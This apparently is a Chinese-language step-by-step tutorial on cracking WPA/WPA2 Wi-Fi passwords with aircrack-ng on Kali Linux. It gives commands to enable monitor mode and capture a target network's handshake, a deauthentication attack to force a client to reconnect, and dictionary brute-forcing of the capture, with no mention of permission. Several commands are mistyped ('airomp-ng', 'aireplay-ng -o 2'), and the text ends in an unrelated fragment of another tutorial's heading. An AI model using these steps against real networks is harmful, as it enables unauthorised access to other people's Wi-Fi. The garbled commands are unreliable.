A. Kali系統使用Aircrack-ng進行暴力破解WIFI密碼
Aircrack-ng是一個與802.11標準的無線網路分析有關的安全軟體,主要功能有:網路偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上(設備列表請參閱其官方網站)並嗅探802.11a,802.11b,802.11g的數據。該程序可運行在Linux和Windows上。Linux版本已經被移植到了Zaurus和Maemo系統平台, 並概念驗證可移植到iPhone。
使用Kali 2021.3進行演示操作
軟體: aircrack-ng (Kali系統內置)
外置無線網卡設備: 要支持監聽,支持Linux並且免驅(我這里使用的是RT3070)
命令: <code>sudo su</code>
解釋: 不在管理員模式下運行可能會有許可權不夠的提示
命令: <code>iwconfig/ifconfig</code>
解釋: iwconfig查看網卡的信息、ifconfig查看新連接的設備
wlan0就是我們的無線網卡
命令: <code>airmon-ng check kill</code>
解釋: 殺死進程可以讓搜索更准確,不會受到影響
命令: <code>airmon-ng</code>
出現你的網卡信息就說明你的網卡支持監聽
命令: <code>airmon-ng start wlan0</code>
解釋: start 開啟哪個介面 wlan0 是介面的名字
再用iwconfig查看一下網卡信息,wlan0後面多了個mon,wlan0mon就說明已經開啟監聽了
命令: <code>airomp-ng wlan0mon</code>
解釋: BSSID:WIFI的MAC地址、PWR:信號強度(值越小信號強度強)、Data:監聽期間流量總合、CH:信道、ENC:加密演算法、ESSID:WIFI名稱
命令: <code>airomp-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數據包的保存位置) wlan0mon</code>
解釋:
我要破解的目標網路是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創建了一個名為1的文件夾
輸入命令: airomp-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
當新的客戶端連接時,客戶端輸入密碼連接就可以抓到握手包,右上角出現WPA時就表示已經抓到了對方的握手包
命令: <code>aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon</code>
解釋:
執行命令<code>aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon</code>
捕捉到握手包時就停止攻擊
命令: <code>aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap</code>
解釋:
最後就是等待跑字典了,下面就是破解的WIFI密碼
命令: <code>airmon-ng stop wlan0mon</code>
在監聽模式下,kali不能連接網路
插入網卡,如果查看不到網卡信息,可以點開連接WIFI看一下能否搜索到附近的網路,如果不行那就右鍵系統可移動設備-把網卡斷開再重新連接一下
插入網卡,打開網卡的監聽模式,搜索附近的WIFI,獲取握手包,最後跑字典破解握手包,這里給大家提供一個常用的密碼字典
B. winaircrackpack教程(破解無線密碼)
有裝無線網卡嗎?